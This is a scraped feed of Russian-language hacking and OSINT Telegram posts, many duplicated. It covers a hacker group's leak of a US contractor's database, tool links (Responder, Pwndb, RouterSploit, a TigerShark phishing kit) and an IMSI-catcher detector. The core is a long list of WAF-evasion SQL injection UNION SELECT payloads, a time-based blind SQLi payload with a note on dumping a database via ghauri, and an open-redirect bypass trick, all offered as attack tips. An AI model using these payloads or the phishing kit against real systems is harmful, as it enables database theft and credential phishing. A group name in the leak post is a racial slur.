Хакерская группа CyberNiggers, представленная IntelBroker, продолжает публиковать уникальные данные. Сегодня они опубликовали базу данных Space Eyes, платформы, которая обеспечивает мониторинг судов, включая военные, в реальном времени через морские и космические источники информации.
Основными клиентами компании являются ВВС и другие государственные структуры США.
#утечка
Основными клиентами компании являются ВВС и другие государственные структуры США.
#утечка
AIMSICD - Android-приложение для обнаружения IMSI-перехватчиков . Эти устройства представляют собой ложные вышки мобильной связи (базовые станции), действующие между целевыми мобильными телефонами и настоящими вышками поставщиков услуг.
▫️https://github.com/CellularPrivacy/Android-IMSI-Catcher-Detector
▫️https://cellularprivacy.github.io/Android-IMSI-Catcher-Detector/
З.Ы. Какие еще приложения можно использовать для выявления технической слежки за вами...
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
▫️https://github.com/CellularPrivacy/Android-IMSI-Catcher-Detector
▫️https://cellularprivacy.github.io/Android-IMSI-Catcher-Detector/
З.Ы. Какие еще приложения можно использовать для выявления технической слежки за вами...
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
👍1
Bypass open redirection whitelisted using chinese dots:
Tip: Keep eyes on SSO redirects
#Bypass
%E3%80%82Tip: Keep eyes on SSO redirects
#Bypass
Bypass SQL union select
#Bypass #SQL
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
👍2
SQL Injection
After this, I used ghauri to extract the database It was successful
#SQL #Injection #ghauri #BugBounty #Tips
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--#SQL #Injection #ghauri #BugBounty #Tips
🖥 Репозиторий: Pwndb — инструмент для поиска email-адресов
Pwndb — это инструмент, который предназначен для поиска утечек данных и скомпрометированных аккаунтов в интернете. Он обеспечивает возможность быстрого поиска информации о пользователях, которые могли попасть в базы данных.
— Данный инструмент консольный, и предназначен для поиска по различным категориям данных, таким как электронные адреса, пароли, имена пользователей и другие личные данные.
⏺ Ссылка на GitHub
#Tools #Osint
Pwndb — это инструмент, который предназначен для поиска утечек данных и скомпрометированных аккаунтов в интернете. Он обеспечивает возможность быстрого поиска информации о пользователях, которые могли попасть в базы данных.
— Данный инструмент консольный, и предназначен для поиска по различным категориям данных, таким как электронные адреса, пароли, имена пользователей и другие личные данные.
⏺ Ссылка на GitHub
#Tools #Osint
🖥 Репозиторий: Responder — инструмент для анализа и перехвата сетевого трафика
Responder — это удобный инструмент, который позволяет анализировать и перехватывать сетевой трафик в локальной сети. Он применяется для исследования сетевых протоколов и выявления потенциальных уязвимостей.
— Данный инструмент предоставляет возможность отслеживать хеши паролей и методы аунтификаций в сетевых протоколах.
⏺ Ссылка на GitHub
#Tools #Network
Responder — это удобный инструмент, который позволяет анализировать и перехватывать сетевой трафик в локальной сети. Он применяется для исследования сетевых протоколов и выявления потенциальных уязвимостей.
— Данный инструмент предоставляет возможность отслеживать хеши паролей и методы аунтификаций в сетевых протоколах.
⏺ Ссылка на GitHub
#Tools #Network
🖥 Lazytainer — инструмент для управления сетевым трафиком в контейнерах Docker
Lazytainer — это инструмент, для отслеживания сетевого трафика к контейнерам Docker и автоматически запускает или останавливает их в зависимости от наличия трафика. Контейнеры могут быть организованы в группы с метками для удобного управления.
— Данный инструмент позволяет настраивать параметры конфигурации для групп, включая порты, тайм-аут неактивности, минимальный порог пакета, частоту опроса, метод сна и сетевой интерфейс.
⏺ Ссылка на GitHub
#Network
Lazytainer — это инструмент, для отслеживания сетевого трафика к контейнерам Docker и автоматически запускает или останавливает их в зависимости от наличия трафика. Контейнеры могут быть организованы в группы с метками для удобного управления.
— Данный инструмент позволяет настраивать параметры конфигурации для групп, включая порты, тайм-аут неактивности, минимальный порог пакета, частоту опроса, метод сна и сетевой интерфейс.
⏺ Ссылка на GitHub
#Network
🖥 Репозиторий: ApkTool — инструмент для реверс инжиниринга андроид приложений
ApkTool — это инструмент для обратного проектирования сторонних закрытых бинарных приложений Android. Он может декодировать программы практически до исходной формы и восстанавливать их после внесения некоторых изменений;
— Данный инструмент позволяет шаг за шагом отлаживать код smali. Это также упрощает работу с приложениями благодаря файловой структуре, напоминающей проект, и автоматизации некоторых повторяющихся задач, таких как создание apk и т. д.
⏺ Ссылка на GitHub
#Tools
ApkTool — это инструмент для обратного проектирования сторонних закрытых бинарных приложений Android. Он может декодировать программы практически до исходной формы и восстанавливать их после внесения некоторых изменений;
— Данный инструмент позволяет шаг за шагом отлаживать код smali. Это также упрощает работу с приложениями благодаря файловой структуре, напоминающей проект, и автоматизации некоторых повторяющихся задач, таких как создание apk и т. д.
⏺ Ссылка на GitHub
#Tools
Forwarded from Сводки частной разведки
1322-2730-1-PB.pdf
1.6 MB
Авторы:
Существующие в Бразилии преступные организации (ПО) банды и ополчения – оказывают огромное влияние на само государство и общественную жизнь. Причины, лежащие в основе появления этих организаций, привели к девальвации человеческой жизни и экстремальному гипернасилию. В целом
за последние несколько десятилетий произошло скачкообразное увеличение количества самих ПО вместе с ростом их численности. Однако данный процесс не ограничивался исключительно увеличением количественных характеристик бразильских ПО.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
✅ Добрый вечер, разведчики! Отличная новость, у проекта GeoSpy появился бот в телеграме. Теперь можно отправить фото боту, и он попробует найти где оно было сделано.
https://t.iss.one/geospy_ai_bot
https://t.iss.one/geospy_ai_bot
👩💻 TigerShark — многофункциональный фишинг-фреймворк
TigerShark - это двуязычный PhishingKit, который включает в себя различные инструменты для фишинга, фреймворки, инструменты для сбора и генерации доменов, инструменты для массовой рассылки.
Этот комплект позволяет создавать небольшие и крупные фишинговые кампании с настраиваемой полезной нагрузкой на нескольких разных языках сценариев.
⏺ Ссылка на GitHub
#Framework #Phishing
TigerShark - это двуязычный PhishingKit, который включает в себя различные инструменты для фишинга, фреймворки, инструменты для сбора и генерации доменов, инструменты для массовой рассылки.
Этот комплект позволяет создавать небольшие и крупные фишинговые кампании с настраиваемой полезной нагрузкой на нескольких разных языках сценариев.
⏺ Ссылка на GitHub
#Framework #Phishing
🖥 Репозиторий: Lookyloo — инструмент для захвата веб-страниц
Lookyloo - это веб-интерфейс, который захватывает веб-страницу, а затем отображает дерево доменов, которые называют друг друга.
— Данный инструмент может быть полезен для анализа цепочек переадресаций на веб-страницах и поможет пользователям лучше понять структуру и связи между доменами при исследовании безопасности и других целях.
⏺ Ссылка на GitHub
#Tools
Lookyloo - это веб-интерфейс, который захватывает веб-страницу, а затем отображает дерево доменов, которые называют друг друга.
— Данный инструмент может быть полезен для анализа цепочек переадресаций на веб-страницах и поможет пользователям лучше понять структуру и связи между доменами при исследовании безопасности и других целях.
⏺ Ссылка на GitHub
#Tools
🖥 Репозиторий: RouterSploit — инструмент для пентеста сетевых устройств
RouterSploit — это фреймворк для тестирования на проникновение в маршрутизаторы и другие сетевые устройства. Он предоставляет возможности для анализа безопасности сетевых устройств, поиска уязвимостей и проведения атак на сетевые устройства.
— Этот инструмент специализируется на тестировании и анализе уязвимостей в сетевых устройствах, помогая повышать уровень безопасности сети.
⏺ Ссылка на GitHub
#Network
RouterSploit — это фреймворк для тестирования на проникновение в маршрутизаторы и другие сетевые устройства. Он предоставляет возможности для анализа безопасности сетевых устройств, поиска уязвимостей и проведения атак на сетевые устройства.
— Этот инструмент специализируется на тестировании и анализе уязвимостей в сетевых устройствах, помогая повышать уровень безопасности сети.
⏺ Ссылка на GitHub
#Network
PH0MBER - OSINT framework, универсальный инструмент для сбора информации и разведки. Он может помочь вам собрать информацию (например, номера телефонов, IP-адрес, информацию о доменном имени и т. д.) из различных общедоступных источников о цели.
▫️https://github.com/s41r4j/phomber
▫️https://pypi.org/project/phomber/
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
▫️https://github.com/s41r4j/phomber
▫️https://pypi.org/project/phomber/
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА